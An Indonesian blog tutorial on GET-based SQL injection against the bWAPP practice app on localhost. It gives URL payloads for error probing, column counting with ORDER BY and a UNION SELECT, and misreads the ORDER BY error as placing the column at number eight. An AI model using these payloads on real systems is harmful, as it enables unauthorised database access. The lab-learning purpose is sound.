Tutorials SQL Injection (GET/Select) ~ ( bWAPP )

sqli bwapp sql injection trolling-system troll your system

1 min read

Hallo everyone :D

Kembali lagi, kali ini gue share tutorial SQL Injection (GET/Select) ~ bWAPP

Mungkin gue akan fokus ke bWAPP kali ya, nanti gue share satu persatu :D

SQL Injection (GET/Select)

Pada kali ini vulnerability terdapat pada form select

Pada kali ini vulnerability terdapat pada URL nya, ketika kita memasukkan payload ' maka error sql syntax pun terjadi
http://localhost:8080/bwapp/sqli_2.php?movie=2'&action=go

Selanjutnya kita mencari column nya dengan cara
http://localhost:8080/bwapp/sqli_2.php?movie=2 order by 8-- -&action=go
Maka muncul
Error: Unknown column '8' in 'order clause'

Berarti menandakan bahwa column berada di nomor 8, selanjutnya kita mencari nomor ajaib nya :D
dengan cara
http://localhost:8080/bwapp/sqli_2.php?movie=.2 union select 1,2,3,4,5,6,7-- -&action=go

Maka angka ajaib yang muncul adalah nomor 2, selanjutnya kita mencari usernya

Ok sekian dulu tutorialnya :D, Next gue share sql injection lagi ya :D

Do you contact me? here > http://trolling-system.net

ordinary people

Troll Your System

Tutorials SQL Injection (GET/Select) ~ ( bWAPP )

You may like these posts

Post a Comment

Website Resmi IndoXploit Diretas, Founder IndoXploit Angkat Bicara!

Perintah Perintah Yang Ada Di Linux Part 2